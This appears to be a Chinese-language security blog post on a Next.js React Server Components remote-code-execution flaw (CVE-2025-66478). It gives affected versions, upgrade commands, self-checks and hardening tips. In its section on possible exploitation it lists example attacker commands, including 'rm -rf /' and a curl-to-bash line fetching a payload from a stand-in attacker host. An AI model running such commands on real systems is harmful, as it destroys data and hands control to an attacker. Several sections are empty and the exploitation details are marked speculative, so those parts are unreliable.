Next.js 爆出严重 RSC 远程代码执行漏洞（CVE-2025-66478）深度分析与升级指南#

发布日期：2025.12
此漏洞影响 Next.js 15/16 版本及部分 14.x canary 版本，且已出现 PoC 利用。官方已发布紧急修复，建议所有生产环境立即升级！

一、漏洞概述#

2025 年 12 月，Next.js 官方发布了关于 React Server Components（RSC）链路中存在远程代码执行（RCE）漏洞 的紧急公告。该漏洞的 CVE 编号为：
CVE-2025-66478 — Next.js RSC Remote Code Execution

二、影响范围#

以下 Next.js 版本均确认受影响：

版本 状态 Next.js 16.x ❌ 受影响 Next.js 15.x ❌ 受影响 Next.js 14.x（canary 部分版本） ❌ 受影响 Next.js 14.x 稳定版 ⚠️ 部分可能受影响（官方建议升级） 如果你的项目包含 app/ 目录（App Router）→ 默认启用 RSC → 100% 有风险。

目录示例：

1
app/
2
 ├─ layout.js
3
 ├─ page.js
4
 └─ ...

三、为什么 RSC 会出现 RCE？#

以下为技术向分析，帮助开发者理解漏洞本质。

四、可被攻击者利用的方式（推测）#

根据目前安全研究人员的复现情况，该漏洞可能允许：

✔ 1. 调用 server actions 并传入恶意参数 ✔ 2. 通过 RSC Payload 调用任意函数引用 ✔ 3. 构造虚假组件指令，让服务器执行动态代码 ✔ 4. 绕过 React 组件隔离，执行 Node.js 原生模块

例如：

1
fs.writeFile
2

3
child_process.exec
4

5
eval
6

7
Function()
8
甚至系统命令，如：
9

10
rm -rf /
11
curl attacker/payload.sh | bash

攻击者无需登录，无需 token，只要能访问你的 /app 入口即可。

五、受影响的生态项目（已确认）#

以下常见开源项目因基于 Next.js，已被列入受影响范围：

六、升级方案（必须执行）#

官方已紧急发布修复，建议立即升级：

1
npm install next@latest

1
pnpm add next@latest

1
yarn add next@latest

1
npm ls next

1
rm -rf .next
2
npm run build

七、如何自查你的项目是否存在风险？#

1. 使用 App Router？

有 /app 目录 = 有 RSC 代码执行链 → 有漏洞

2. 是否开启 SSR？

以下任意特征均可能受影响：

1
export const dynamic = 'force-dynamic'
2

3
fetch() 服务端调用
4

5
server actions
6

7
middleware

3. 你的服务是否暴露到公网？

公网 = 高危 内网 = 仍有风险（如公司被 phishing 入侵）

八、安全加固建议（升级后仍建议执行）#

1. WAF 防护

开放在 Cloudflare / 阿里云的用户应启用：

SSR Injection 防护

JSON 序列化攻击防护

2. 清理旧构建 rm -rf .next

3. 检查日志

搜索是否出现大量异常 RSC 请求：

1
/_next/flight
2
/_next/data
3
rsc=1

4. 手动关闭不必要的 server actions

若项目对安全要求高，可考虑禁用自动暴露的 actions。

九、官方与参考资料#

阿里云漏洞库： https://avd.aliyun.com/detail?id=AVD-2025-66478

GitHub Security Advisory： （建议关注 Next.js 官方仓库）